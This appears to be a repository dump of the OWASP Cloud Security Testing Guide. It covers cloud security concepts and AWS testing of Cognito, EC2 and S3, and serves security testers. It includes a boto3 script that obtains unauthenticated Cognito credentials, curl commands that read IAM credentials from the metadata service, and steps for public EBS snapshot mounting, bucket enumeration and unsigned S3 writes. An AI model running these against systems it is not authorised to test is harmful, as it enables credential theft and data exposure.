├── .github └── ISSUE_TEMPLATE │ ├── content-correction.md │ └── propose-new-content.md ├── Document ├── 0x01-Overview.md ├── 0x02-Amazon-AWS-Testing-Guide.md └── 0x02a-Platform-Overview.md ├── README.md ├── cloud-model.jpg ├── cognito.md ├── ec2.md └── s3.md /.github/ISSUE_TEMPLATE/content-correction.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Content Correction 3 | about: Let us know if you feel there is content that needs correcting. 4 | title: '' 5 | labels: enhancement, invalid 6 | assignees: '' 7 | 8 | --- 9 | 10 | **Describe the issue** 11 | A clear and concise description of what is missing/ wrongly formulated / misspelled (why not create a PR directly?) / lacks effectiveness (in terms of detection or remediation). 12 | 13 | **Optional: Additional context** 14 | Add any other context about the issue here. 15 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/propose-new-content.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Propose New Content 3 | about: Propose additions to the Cloud Security Testing Guide. 4 | title: '' 5 | labels: enhancement 6 | assignees: '' 7 | 8 | --- 9 | 10 | **What would you like added?** 11 | Briefly describe the topic of the new content. Is this a new section or an addition to an existing topic? 12 | 13 | Would you like to be assigned to this issue? 14 | Check the box if you will submit a PR to add the proposed content. Please read CONTRIBUTING.md. 15 | - [ ] Assign me, please! 
16 |
--------------------------------------------------------------------------------
/Document/0x01-Overview.md:
--------------------------------------------------------------------------------
1 |
2 | # Overview
3 |
4 | ## Introduction to the OWASP Cloud Security Testing Guide
5 |
6 | As the adoption of cloud computing grows, organisations are increasingly migrating their environments into highly dynamic cloud ecosystems. Whilst cloud services may address a number of fundamental historic security risks, they are not fail-safe and operate on a Shared Responsibility Model (https://aws.amazon.com/compliance/shared-responsibility-model/), which means that Security and Compliance is shared between the Cloud Provider and the customer.
7 |
8 | ### Key Areas in Cloud Security
9 |
10 | Security within cloud environments is heavily influenced by the main models for cloud computing as defined by each Cloud Service Provider: Infrastructure as a Service (IaaS), Platform as a Service (PaaS), and Software as a Service (SaaS).
11 |
12 |  13 |
14 | To put it simply, depending on the cloud computing model in question, it is a matter of Security "in" the Cloud vs. Security "of" the Cloud, as defined by the "Shared Responsibility Model" used by each Cloud Service Provider.
15 |
16 | The existence of the Shared Responsibility Model, combined with the complexity of the cloud services offered by each Cloud Service Provider, directly impacts the way security tests are performed in comparison with traditional security assessments.
17 |
18 | In some ways, testers who have experience penetration testing in traditional on-premises environments can easily apply their knowledge when testing the security of cloud assets, as the operating systems and applications are fundamentally the same.
19 |
20 | In other ways, the high speed at which Cloud Service Providers release products and services means that penetration testers must continuously maintain an in-depth understanding of each new product released by the Cloud Service Provider(s) in order to understand how it can be vulnerable to exploitation and, more importantly, how to secure it from misuse.
21 |
22 | Let's discuss the key areas in cloud service provider security.
23 |
24 | #### Cloud Data Storage
25 |
26 | Cloud Data Storage is a major service offered by the majority of Cloud Service Providers. Cloud storage services are used to store both non-sensitive and sensitive data, such as database backups, file-system backups, user credentials, PII and more, in resources commonly referred to as "Buckets".
27 |
28 | Although the key to protecting cloud storage services lies in the proper configuration of Access Control Lists (ACLs), there are still factors that can lead to the compromise of data, such as the insecure storage of the API keys used to provide access to said services.
29 |
30 | When developing applications and networks, we must ensure that authentication credentials such as the API keys used to provide access to cloud storage services are considered during the design process. One common bad practice is for developers to hardcode cloud storage service API keys into applications whose source code is available to end-users, thereby compromising the security of entire cloud storage buckets.
31 |
32 | #### Internal Cloud API Services
33 |
34 | Cloud service providers offer a vast number of internal API endpoints that can be accessed on-demand by any process running on internal assets such as compute services. These internal APIs offer a range of functions, such as, but not limited to, the generation of access credentials, access to instance metadata, and access to credential vaults that contain hundreds or in some cases thousands of credentials used by internal resources.
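As an illustration of how such an internal API is reached, the following is a minimal sketch (not part of the guide's methodology; the helper names are ours, while the endpoint address is the standard AWS instance metadata address) of a process on a compute instance querying the metadata API:

```python
# Illustrative sketch: querying the AWS instance metadata API from inside
# an EC2 instance. Helper names are ours; the endpoint is the standard
# IMDS address, reachable only from within the instance itself.
from urllib.request import urlopen

IMDS_BASE = "http://169.254.169.254/latest/meta-data/"

def imds_url(path: str) -> str:
    """Build the full metadata URL for a path such as 'ami-id'."""
    return IMDS_BASE + path.lstrip("/")

def read_metadata(path: str, timeout: float = 2.0) -> str:
    """Fetch a metadata value; this only works from inside an instance."""
    with urlopen(imds_url(path), timeout=timeout) as resp:
        return resp.read().decode()

# Example usage (only meaningful when run on an EC2 instance):
#   read_metadata("ami-id")                     # the instance's AMI ID
#   read_metadata("iam/security-credentials/")  # any attached IAM role name
```

Because any local process can call this endpoint, any vulnerability that lets an attacker proxy requests through the instance also exposes it.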
35 |
36 | Although the metadata service is almost never exposed to the internet, it may be indirectly exposed by a vulnerable internet-facing application. For example, a server-side request forgery (SSRF) vulnerability in a cloud-hosted web application could expose the metadata service to the entire internet. Attackers may use the leaked metadata to further compromise internal assets or even compromise the entire cloud infrastructure.
37 |
38 | Metadata APIs are most effectively protected by the Cloud Service Providers themselves; where such protection is not available, organisations should enforce preventative measures to minimise the risk: network-layer controls that prevent unnecessary access to the internal APIs, combined with least-privilege IAM roles, so that only the services or processes that need to query the internal APIs are able to do so.
39 |
40 | #### Authentication and Authorisation
41 |
42 | Authenticating to cloud environments can be performed using a number of methods, such as, but not limited to, console access, API access and IAM access, each with its own access control policies and rules. Statistically speaking, the more accounts and authentication methods an organisation uses, the higher the chance that one of these accounts will be compromised.
43 |
44 | It is not uncommon for cloud access keys to be exposed. They can be exposed within public source code repositories, unprotected issue trackers, unprotected Kubernetes dashboards, and other such sources.
45 |
46 | Organisations should take extra precautions to securely store their keys, creating unique keys for each external service and restricting access following the principle of least privilege.
47 |
48 |
49 | #### Architecture Design
50 |
51 | Not all security issues within cloud environments are directly caused by vulnerable software.
Just as traditional networks require carefully planned architecture, using practices such as risk assessments, threat modelling and security requirements, so too do cloud environments require carefully designed network structures to increase resilience and prevent attackers from easily pivoting throughout internal cloud networks after exploiting a single vulnerability. 52 |
53 | When testing cloud environments, it is important to address any poorly implemented security architecture, such as, but not limited to, excessive port exposure on compute resources that should only have service-specific ports open.
54 |
55 | Each cloud environment and organisation will have different technical and business requirements that will influence the structure of their internal cloud architecture; testers must be able to identify risks within these designs and recommend changes where necessary to avoid unnecessary exposure or high-risk configurations.
56 |
57 | #### Secure Configuration & Monitoring
58 |
59 | A large percentage of the security issues that are exploited within a cloud environment can be mitigated with sufficient configuration and monitoring.
60 |
61 | From a testing perspective, almost all of the tools designed to audit the security of cloud environments perform configuration checks that are matched against specific best practices or compliance benchmarks such as NIST and CIS. Although this means that some testing can be automated, Cloud Service Providers continuously update, modify and release new cloud products and services, which means that testers must not rely solely on available scanning tools to review security and monitoring configurations.
62 |
63 |
64 | ## Navigating the Cloud Security Testing Guide
65 |
66 | The CSTG contains the following main sections:
67 |
68 | 1. The [Amazon Web Services Testing Guide]() covers Amazon Web Services testing methodologies, a cloud service provider overview, and security best-practices.
69 |
70 | 2. The [Microsoft Azure Testing Guide]() covers Microsoft Azure testing methodologies, a cloud service provider overview, and security best-practices.
71 |
72 | 3. The [Google Cloud Testing Guide]() covers Google Cloud Platform testing methodologies, a cloud service provider overview, and security best-practices.
73 |
--------------------------------------------------------------------------------
/Document/0x02-Amazon-AWS-Testing-Guide.md:
--------------------------------------------------------------------------------
1 | # Amazon AWS Testing Guide
2 |
--------------------------------------------------------------------------------
/Document/0x02a-Platform-Overview.md:
--------------------------------------------------------------------------------
1 |
2 | ## Amazon AWS Platform Overview
3 |
4 | Security and Compliance is a shared responsibility between AWS and the customer. This section introduces the Amazon AWS platform from an architecture point of view. The following areas are discussed:
5 |
6 | - AWS responsibility "Security of the Cloud"
7 | - Customer responsibility "Security in the Cloud"
8 |
9 |
10 |  11 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | [](https://creativecommons.org/licenses/by-sa/4.0/ "CC BY-SA 4.0")
2 |
3 | [](https://github.com/OWASP/Cloud-Testing-Guide)
4 |
5 | # OWASP Cloud Security Testing Guide
6 | This is the official GitHub Repository of the OWASP Cloud Security Testing Guide (CSTG). The CSTG is designed to be a comprehensive guide for developers, cloud architects, security testers and anyone else involved in the securing of cloud environments.
7 |
8 | The high speed at which Cloud Service Providers release and update products and services means that anyone responsible for securing such environments must continuously maintain an in-depth understanding of each Cloud Service Provider's offerings.
9 |
10 | For this reason, the CSTG combines comprehensive, objective technical processes for testing the security of cloud environments with a high-level view of the key areas in cloud security.
11 |
12 |
13 |
14 |
15 | ## Table of Contents
16 |
17 | ### Introduction
18 |
19 |
20 | - [Introduction to the Cloud Security Testing Guide](Document/0x01-Overview.md)
21 |
22 |
23 | ### Key Areas in Cloud Security
24 |
25 | - [Cloud Data Storage](Document/0x01-Overview.md#cloud-data-storage)
26 | - [Internal Cloud API Services](Document/0x01-Overview.md#internal-cloud-api-services)
27 | - [Authentication and Authorisation](Document/0x01-Overview.md#authentication-and-authorisation)
28 | - [Architecture Design](Document/0x01-Overview.md#architecture-design)
29 | - [Secure Configuration & Monitoring](Document/0x01-Overview.md#secure-configuration--monitoring)
30 |
31 | ## Amazon AWS Testing Guide
32 |
33 | - [Platform Overview](Document/0x02a-Platform-Overview.md)
34 | - [Basic Security Testing]()
35 | - [Access Methods]()
36 | - [Resource Inventory]()
37 |
38 |
39 | ### Compute Services
40 | - [Amazon Elastic Compute Cloud (Amazon EC2)]()
41 | - [AWS Lambda]()
42 | - [Amazon Elastic Container Registry (ECR)]()
43 |
44 | ### Networking
45 | - [VPC]()
46 |
47 | ### Cloud Data Storage
48 | - [Amazon Simple Storage Service (Amazon S3)]()
49 | - [Amazon Elastic Block Store (Amazon EBS)]()
50 |
51 | ## Microsoft Azure Testing Guide
52 |
53 | ## Project Leaders
54 | - [Stefano Di Paola](https://github.com/wisec)
55 | - [Jamieson O'Reilly](https://github.com/orlyjamie)
56 |
--------------------------------------------------------------------------------
/cloud-model.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/OWASP/owasp-cstg/05ef619177472bcd34d1e1b215873a3fcdb58617/cloud-model.jpg
--------------------------------------------------------------------------------
/cognito.md:
--------------------------------------------------------------------------------
1 | # Cognito Overview
2 |
3 | Cognito provides developers with an authentication, authorization and user management system that can be implemented in web applications. Cognito is divided into two main components: User Pools (Amazon Cognito User Pools: https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-user-identity-pools.html) and Identity Pools (Amazon Cognito Identity Pools: https://docs.aws.amazon.com/cognito/latest/developerguide/cognito-identity.html). The Amazon documentation on Cognito states that:
4 |
5 |
6 | User pools are user directories that provide sign-up and sign-in options for your app users. Identity pools enable you to grant your users access to other AWS services. You can use identity pools and user pools separately or together. (What is Amazon Cognito? https://docs.aws.amazon.com/cognito/latest/developerguide/what-is-amazon-cognito.html)
7 |
8 | From a security perspective, identity pools in Cognito are particularly interesting, as they can provide access to other Amazon Web Services.
9 |
10 |
11 | === Identity Pools ===
12 | Identity pools are identified by an ID that looks like the following:
13 |
14 | us-east-1:1a1a1a1a-ffff-1111-9999-12345678
15 |
16 |
17 | A web application will thus query Cognito, specifying the proper Identity Pool ID, in order to get temporary limited-privilege AWS credentials to access other AWS services. An identity pool also allows specifying a role for users that are not authenticated.
18 | In the Cognito configuration page, there is the option to enable Unauthenticated identities, which Amazon describes as follows:
19 |
20 |
21 | Unauthenticated roles define the permissions your users will receive when they access your identity pool without a valid login. 22 |23 | 24 | '''Example:'''
25 | The following script uses the Python boto3 library (boto3: https://boto3.amazonaws.com/v1/documentation/api/latest/index.html), which can be installed with:
26 |
27 |
28 | pip install boto3
29 |
30 |
31 | In the following script, replace [IDENTITY_POOL] with the target Identity Pool ID.
32 |
33 |
34 | import boto3
35 | from botocore.exceptions import ClientError
36 |
37 | try:
38 |     # Get an identity ID for the pool, then temporary credentials for it
39 |     client = boto3.client('cognito-identity', region_name="us-east-2")
40 |     resp = client.get_id(IdentityPoolId='[IDENTITY_POOL]')
41 |
42 |     print("\nIdentity ID: %s" % resp['IdentityId'])
43 |     print("\nRequest ID: %s" % resp['ResponseMetadata']['RequestId'])
44 |     resp = client.get_credentials_for_identity(IdentityId=resp['IdentityId'])
45 |     secretKey = resp['Credentials']['SecretKey']
46 |     accessKey = resp['Credentials']['AccessKeyId']
47 |     sessionToken = resp['Credentials']['SessionToken']
48 |     print("\nSecretKey: %s" % secretKey)
49 |     print("\nAccessKey ID: %s" % accessKey)
50 |     print("\nSessionToken %s" % sessionToken)
51 |
52 |     # List all bucket names reachable with the temporary credentials
53 |     s3 = boto3.resource('s3', aws_access_key_id=accessKey, aws_secret_access_key=secretKey, aws_session_token=sessionToken, region_name="eu-west-1")
54 |     print("\nBuckets:")
55 |     for b in s3.buckets.all():
56 |         print(b.name)
57 |
58 | except (ClientError, KeyError):
59 |     print("No unauthenticated access")
60 |     exit(0)
61 |
62 |
63 | If unauthenticated access to S3 buckets is allowed, the output should look like this:
64 |
65 | Identity ID: us-east-2:ddeb887a-e235-41a1-be75-2a5f675e0944
66 | Request ID: cb3d99ba-b2b0-11e8-9529-0b4be486f793
67 | SecretKey: wJE/[REDACTED]Kru76jp4i
68 | AccessKey ID: ASI[REDACTED]MAO3
69 | SessionToken AgoGb3JpZ2luELf[REDACTED]wWeDg8CjW9MPerytwF
70 |
71 | Buckets:
72 | bucket-test-01
73 | bucket-test-02
74 |
75 |
76 | == References ==
77 |
78 |
--------------------------------------------------------------------------------
/ec2.md:
--------------------------------------------------------------------------------
1 | == Elastic Compute Cloud (EC2) Overview ==
2 | Elastic Compute Cloud (EC2) is a widely used service offered by Amazon. It allows users to rent virtual computers that can be used to run arbitrary applications. EC2 provides a scalable solution to deploy a new computer, which in AWS terminology is called an "instance", and manage its status via a web-based user interface. The user can manage every aspect of an EC2 instance, from its creation and execution to the definition of access policies. EC2 instances provide many different features, two of which are particularly relevant from a security perspective: Elastic Block Store (https://aws.amazon.com/ebs/) and the Instance Metadata Service (Instance Metadata and User Data: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html).
3 |
4 |
5 |
6 | === Publicly accessible EC2 snapshots ===
7 | EBS snapshots are, by default, stored in a private S3 bucket that is not directly accessible via the S3 dashboard. However, EBS snapshots are manageable via the EC2 interface and their permissions can be changed to be public. If an EBS snapshot is publicly accessible, it is possible to access the EBS block by mounting it in an EC2 instance under your control. EBS blocks are essentially virtual disks that can be mounted like any other virtual disk in EC2.
To mount an EBS block, two things are needed: 8 |
9 | # an EC2 instance where the EBS snapshot can be mounted;
10 | # the ID that identifies the EBS snapshot.
11 |
12 | To get an EC2 instance, refer to the AWS documentation on how to create and launch an EC2 instance (Create Your EC2 Resources and Launch Your EC2 Instance: https://docs.aws.amazon.com/efs/latest/ug/gs-step-one-create-ec2-resources.html).
13 |
14 | To get the ID that identifies an EBS snapshot, the aws command line tool can be used to search for publicly accessible EBS snapshots:
15 |
16 |
17 | aws --profile [PROFILE] ec2 describe-snapshots --filters [FILTERS] --region [REGION]
18 |
19 |
20 | The command above will respond with a JSON listing all the publicly available snapshots that satisfy the values specified by the --filters flag (for a complete description of the available filters refer to the describe-snapshots documentation: https://docs.aws.amazon.com/cli/latest/reference/ec2/describe-snapshots.html). The JSON will contain information about each snapshot along with the SnapshotId that identifies it. For example, to list all the publicly accessible snapshots whose description contains the word backup and that are located in the us-east-2 region, use the following command:
21 |
22 |
23 | aws --profile default ec2 describe-snapshots --filters Name=description,Values="*backup*" --region us-east-2
24 |
29 | { 30 | "Snapshots": [ 31 | { 32 | "Description": "Phoenix_competitor_analysis_backup_set", 33 | "Encrypted": false, 34 | "VolumeId": "vol-ffffffff", 35 | "State": "completed", 36 | "VolumeSize": 100, 37 | "StartTime": "2017-08-30T05:24:48.000Z", 38 | "Progress": "100%", 39 | "OwnerId": "234190327268", 40 | "SnapshotId": "snap-0dc716aaf28921496" 41 | }, 42 | { 43 | "Description": "backup", 44 | "Encrypted": false, 45 | "VolumeId": "vol-0b21c8a6c158367fc", 46 | "State": "completed", 47 | "VolumeSize": 8, 48 | "StartTime": "2018-05-21T13:01:49.000Z", 49 | "Progress": "100%", 50 | "OwnerId": "388304843501", 51 | "SnapshotId": "snap-041c06c0c3658323c" 52 | }, 53 | { 54 | "Description": "backup", 55 | "Encrypted": false, 56 | "VolumeId": "vol-0ee056a878d9dfdb1", 57 | "State": "completed", 58 | "VolumeSize": 30, 59 | "StartTime": "2018-01-07T13:52:56.000Z", 60 | "Progress": "100%", 61 | "OwnerId": "682345607706", 62 | "SnapshotId": "snap-0e793674b08737e95" 63 | }, 64 | { 65 | "Description": "copy of backup sprerdda - BAckup-17-8-2018", 66 | "Encrypted": false, 67 | "VolumeId": "vol-ffffffff", 68 | "State": "completed", 69 | "VolumeSize": 30, 70 | "StartTime": "2018-08-22T15:03:48.179Z", 71 | "Progress": "100%", 72 | "OwnerId": "869858413856", 73 | "SnapshotId": "snap-02326682d84d3aedd" 74 | } 75 | ] 76 | } 77 |78 | 79 | Once the snapshot has been identified, it is possible to mount it by creating an EBS volume in your account: 80 | 81 |
82 | aws ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id [SNAPSHOT_ID]
83 |
84 |
85 | === Metadata leakage ===
86 | EC2 instances have a feature called the Instance Metadata Service (IMS). IMS allows any AWS EC2 instance to retrieve data about the instance itself that can be used to configure or manage the running instance. IMS is accessible from within the instance itself by querying the end-point located at http://169.254.169.254.
87 |
88 | IMS returns much interesting information, such as that shown in the table below (for a complete list refer to the Instance Metadata Categories documentation: https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories).
89 |
90 | {| class="wikitable"
91 | |-
92 | |http://169.254.169.254/latest/meta-data/ami-id
93 | |The AMI ID used to launch the instance.
94 | |-
95 | |http://169.254.169.254/latest/meta-data/iam/security-credentials/
96 | |If there is an IAM role associated with the instance, it returns the role's name (which can be used in the next handler).
97 | |-
98 | |http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name
99 | |If there is an IAM role associated with the instance, where role-name is the name of the role, it returns the temporary security credentials associated with the role (for more information, see Retrieving Security Credentials from Instance Metadata). Otherwise, not present.
100 | |-
101 | |http://169.254.169.254/latest/user-data
102 | |Returns a user-defined script which is run the first time a new EC2 instance is launched.
103 | |}
104 |
105 |
106 | Examples:
107 | Command:
108 |
109 | curl http://169.254.169.254/latest/meta-data/ami-id 110 |111 | Output: 112 |
113 | ami-336b4456 114 |115 | 116 | Command: 117 |
118 | curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ 119 |120 | Output: 121 |
122 | IAM_TEST_S3_READ 123 |124 | 125 | Command: 126 |
127 | curl http://169.254.169.254/latest/meta-data/iam/security-credentials/IAM_TEST_S3_READ 128 |129 | Output: 130 |
131 | { 132 | "Code" : "Success", 133 | "LastUpdated" : "2018-08-27T15:23:14Z", 134 | "Type" : "AWS-HMAC", 135 | "AccessKeyId" : "AS[REDACTED]TEM", 136 | "SecretAccessKey" : "EgKirlp[REDACTED]hkYp", 137 | "Token" : "FQoGZXIvYXdzEJH//////////wE[REDACTED]=", 138 | "Expiration" : "2018-08-27T21:36:24Z" 139 | } 140 |141 | 142 | Command: 143 |
144 | curl http://169.254.169.254/latest/user-data 145 |146 | Output: 147 |
148 | #!/bin/bash -xe
149 | sudo apt-get update
150 | # install coturn
151 | apt-get install -y coturn
152 | # install kms
153 | sudo apt-get update
154 | sudo apt-get install -y wget
155 | echo "deb http://ubuntu.kurento.org xenial kms6" | sudo tee /etc/apt/sources.list.d/kurento.list
156 | wget -O - http://ubuntu.kurento.org/kurento.gpg.key | sudo apt-key add -
157 | sudo apt-get update
158 | sudo apt-get install -y kurento-media-server-6.0
159 | systemctl enable kurento-media-server-6.0
160 | # enable coturn
161 | sudo echo TURNSERVER_ENABLED=1 > /etc/default/coturn
162 | # turn config file
163 | sudo cat >/etc/turnserver.conf<<-EOF
164 | [...]
165 |
166 | sudo /usr/local/bin/cfn-signal -e $? --stack arn:aws:cloudformation:us-east-2:118366151276:sta
167 |
168 |
169 | To be able to access such information, an attacker has to find a way to query http://169.254.169.254 from within the EC2 instance itself. There are many ways in which this can be accomplished, from finding a Server-Side Request Forgery (SSRF) vulnerability (Abusing the AWS metadata service using SSRF vulnerabilities: https://blog.christophetd.fr/abusing-aws-metadata-service-using-ssrf-vulnerabilities/; When a web application SSRF causes the cloud to rain credentials & more: https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/when-a-web-application-ssrf-causes-the-cloud-to-rain-credentials-and-more/), or exploiting a proxy set up on the EC2 instance, all the way to DNS rebinding (DNS Rebinding Headless Browsers: https://labs.mwrinfosecurity.com/blog/from-http-referer-to-aws-security-credentials/).
170 |
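To make the impact of a leak concrete, the following is a minimal sketch (our own illustration, with placeholder values) of parsing the credential document shown above into the three values an attacker, or any AWS SDK, could reuse:

```python
# Illustrative sketch: extracting the reusable credential triple from the
# JSON document returned by .../iam/security-credentials/[role-name].
# The sample document below uses placeholder values, not real credentials.
import json

def parse_imds_credentials(doc: str) -> dict:
    """Map an IMDS credential document onto the three reusable values."""
    data = json.loads(doc)
    return {
        "access_key": data["AccessKeyId"],
        "secret_key": data["SecretAccessKey"],
        "token": data["Token"],
    }

sample = """{"Code": "Success", "AccessKeyId": "AKIA_EXAMPLE",
"SecretAccessKey": "SECRET_EXAMPLE", "Token": "TOKEN_EXAMPLE",
"Expiration": "2018-08-27T21:36:24Z"}"""
creds = parse_imds_credentials(sample)
# The three values map directly onto the standard AWS_ACCESS_KEY_ID,
# AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN environment variables.
```

Once exported into those environment variables, the stolen role credentials work with the aws command line tool or any SDK until they expire.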
171 | == External Resources ==
172 | This is a collection of additional external resources related to testing EC2.
173 |
174 | * DNS Rebinding Headless Browsers (https://labs.mwrinfosecurity.com/blog/from-http-referer-to-aws-security-credentials/)
175 | * Cloud Metadata (https://gist.github.com/BuffaloWill/fa96693af67e3a3dd3fb)
176 | * Abusing the AWS metadata service using SSRF vulnerabilities (https://blog.christophetd.fr/abusing-aws-metadata-service-using-ssrf-vulnerabilities/)
177 | * EC2's most dangerous feature (http://www.daemonology.net/blog/2016-10-09-EC2s-most-dangerous-feature.html)
178 |
179 | == References ==
180 |
181 |
--------------------------------------------------------------------------------
/s3.md:
--------------------------------------------------------------------------------
1 | == Simple Storage Service (S3) Overview ==
2 | Simple Storage Service (S3) is among the most popular of the AWS services (The Most Popular AWS Products of 2018: https://www.clickittech.com/aws/top-10-aws-services/; Top 10 AWS services you should know about (2019 Edition): https://www.2ndwatch.com/blog/popular-aws-products-2018/) and provides a scalable solution for object storage via web APIs (Amazon S3 - Wikipedia: https://en.wikipedia.org/wiki/Amazon_S3). S3 buckets can be employed for many different usages and in many different scenarios.
3 | Given a bucket named mybucket, it is possible to access the bucket via the following URLs:
15 |
16 | 17 | https://s3-[region].amazonaws.com/[bucketname]/ 18 |19 | Where
[region]
depends on the one selected during bucket creation.
20 |
21 | 22 | https://[bucketname].s3.amazonaws.com/ 23 |24 | 25 | S3 also provides the possibility of hosting static HTML content thus making an S3 bucket behaving as a static HTML web server. If this option is selected for a bucket, the following URL can be used to access the HTML code contained in that bucket: 26 | 27 |
28 | https://[bucketname].s3-website-[region].amazonaws.com/
29 |
30 |
31 | === Identifying S3 buckets ===
32 | The first step when testing a web application that makes use of AWS S3 buckets is identifying the bucket(s) themselves, meaning the URL that can be used to interact with each bucket.
33 | '''Note:''' it is not necessary to know the region of an S3 bucket to identify it. Once the name is found, it is possible to cycle through the regions until the right one is found.
34 |
35 | ==== HTML Inspection ====
36 | The web application might expose the URL to the S3 bucket directly within the HTML code. To search for S3 buckets within HTML code, inspect the code for substrings such as:
37 |
38 | s3.amazonaws
39 | amazonaws
40 |
41 |
42 | ==== Brute force / Educated guessing ====
43 | A brute-force approach, possibly based on a word-list of common words along with specific words coming from the domain under testing, might be useful in identifying S3 buckets.
44 | As described in the previous section, S3 buckets are identified by a predefined and predictable naming schema that can be useful for bucket identification. By means of an automated tool it is possible to test multiple URLs in search of S3 buckets, starting from a word-list.
45 |
46 | In OWASP ZAP (v2.7.0) the fuzzer feature can be used for testing:
47 | # With OWASP ZAP up and running, navigate to
https://s3.amazonaws.com/bucket
to generate a request to https://s3.amazonaws.com/bucket
in the Sites
panel;
48 | # From the Sites
panel, right click on the GET request and select Attack -> Fuzz
to configure the fuzzer;
49 | # Select the word bucket
from the request to tell the fuzzer to fuzz in that location;
50 | # Click Add
and Add
again to specify the payload the fuzzer will use;
51 | # Select the type of payload, which could be a list of strings given to ZAP itself or loaded from a file;
52 | # Finally, press Add to add the payload, Ok to confirm the settings, and Start Fuzzer to start fuzzing.
53 |
54 | If a bucket is found, ZAP will show a response with status code 301 Moved Permanently; on the other hand, if the bucket does not exist, the response status will be 404 Not Found.
55 |
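The same 301-vs-404 observation can be scripted without ZAP. The following is a minimal sketch (the helper names and candidate bucket names are ours, not part of any standard tool): a 404 response means the candidate name is unused, while a 301, 403 or 200 response means the bucket exists.

```python
# Illustrative sketch: brute-forcing bucket names by HTTP status code.
# 404 = name unused; 301/403/200 = the bucket exists (possibly private).
from urllib.request import Request, urlopen
from urllib.error import HTTPError

def bucket_url(name: str) -> str:
    """Build the virtual-hosted-style URL for a candidate bucket name."""
    return f"https://{name}.s3.amazonaws.com/"

def bucket_exists(name: str, timeout: float = 5.0) -> bool:
    try:
        urlopen(Request(bucket_url(name), method="HEAD"), timeout=timeout)
        return True            # 2xx: bucket exists and is readable
    except HTTPError as err:
        return err.code != 404  # 301/403: exists but redirected or private

# Example usage (performs real network requests):
#   for candidate in ("example-legacy", "example-uploads", "example-backup"):
#       print(candidate, bucket_exists(candidate))
```

Candidate names would normally come from the same word-list used with the ZAP fuzzer above.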
56 | ==== Google Dork ====
57 | Google Dorks (Google Hacking - Wikipedia: https://en.wikipedia.org/wiki/Google_hacking) can also be used to search for S3 bucket URLs. The inurl: operator provided by Google can be used to search for S3 buckets, for example by searching for common names as shown in the following list:
58 |
59 |
60 | inurl:s3.amazonaws.com/legacy/
61 | inurl:s3.amazonaws.com/uploads/
62 | inurl:s3.amazonaws.com/backup/
63 | inurl:s3.amazonaws.com/mp3/
64 | inurl:s3.amazonaws.com/movie/
65 | inurl:s3.amazonaws.com/video/
66 | inurl:s3.amazonaws.com
67 |
68 |
69 | More Google Dorks (Google hacking Amazon Web Services Cloud front and S3: https://it.toolbox.com/blogs/rmorril/google-hacking-amazon-web-services-cloud-front-and-s3-011613) can be used for S3 bucket identification.
70 |
71 | ==== Bing reverse IP ====
72 | Microsoft's Bing search engine can be helpful in identifying S3 buckets thanks to its feature of searching domains given an IP address. Given the IP address of a known S3 end-point, the ip:[IP] feature of Bing can be used to retrieve other S3 buckets resolving to the same IP.
73 |
74 | ==== DNS Caching ====
75 | There are many services that maintain a DNS cache that can be queried by users to find the domain names corresponding to an IP address and vice versa. By taking advantage of such services it is possible to identify S3 buckets. The following list shows some services worth noting:
76 |
77 |
78 | https://findsubdomains.com/ 79 | https://www.robtex.com/ 80 | https://buckets.grayhatwarfare.com/ (created specifically to collect AWS S3 buckets) 81 |82 | 83 | The following is a screenshot from https://findsubdomains.com showing how it is possible to retrieve S3 buckets by searching for subdomains of
s3.amazonaws.com
.
84 |
85 | === S3 buckets permissions ===
86 |
87 | An S3 bucket provides a set of five permissions that can be granted at the bucket level or at the object level.
88 | S3 bucket permissions can be tested in two ways: via HTTP requests or by using the aws command line tool.
89 |
90 | READ
91 |
92 | At the bucket level, allows listing the objects in the bucket.
93 | At the object level, allows reading the content as well as the metadata of the object.
94 |
95 | WRITE
96 |
97 | At the bucket level, allows creating, overwriting, and deleting objects in the bucket.
98 | At the object level, allows editing the object itself.
99 |
100 | READ_ACP
101 |
102 | At the bucket level, allows reading the bucket’s Access Control List.
103 | At the object level, allows reading the object’s Access Control List.
104 |
105 | WRITE_ACP
106 |
107 | At bucket level allows to set the Access Control List for the bucket.
108 | At object level allows to set an Acess Control List for the object.
109 |
110 | FULL_CONTROL
111 |
112 | At bucket level is equivalent to granting the READ
, WRITE
, READ_ACP
, and WRITE_ACP
permissions.
113 | At the object levelis equivalent to granting the READ
, WRITE
, READ_ACP
, and WRITE_ACP
.
114 |
==== READ Permission ====
Via HTTP, try to access the bucket by requesting the following URL:

```
https://[bucketname].s3.amazonaws.com
```

It is also possible to use the `aws s3 ls` command (documentation: https://docs.aws.amazon.com/cli/latest/reference/s3/ls.html) to list the content of a bucket:

```
aws s3 ls s3://[bucketname] --no-sign-request
```

'''Note:''' the `--no-sign-request` flag specifies not to use credentials to sign the request.
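The HTTP check can be scripted. Below is a minimal Python sketch, assuming the standard S3 responses to an unsigned GET: 200 when the listing is public, 403 when the bucket exists but denies anonymous READ, and 404 when the bucket does not exist. The function names are illustrative:

```python
import urllib.error
import urllib.request

def classify_read(status):
    """Interpret the HTTP status returned by an unsigned GET on a bucket URL."""
    if status == 200:
        return "listable"        # anonymous READ granted at bucket level
    if status == 403:
        return "access denied"   # bucket exists, anonymous READ denied
    if status == 404:
        return "no such bucket"
    return "unknown"

def check_bucket_read(bucketname):
    """Send an unsigned GET to the virtual-hosted-style bucket URL."""
    url = f"https://{bucketname}.s3.amazonaws.com"
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return classify_read(resp.status)
    except urllib.error.HTTPError as e:
        return classify_read(e.code)
```

For example, `check_bucket_read("somebucket")` returns one of the strings above depending on the bucket's anonymous READ grant.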
==== WRITE Permission ====
Via the `aws` command line tool it is possible to write to a bucket using the `aws s3 cp` command (documentation: https://docs.aws.amazon.com/cli/latest/reference/s3/cp.html):

```
aws s3 cp localfile s3://[bucketname]/file.txt --no-sign-request
```

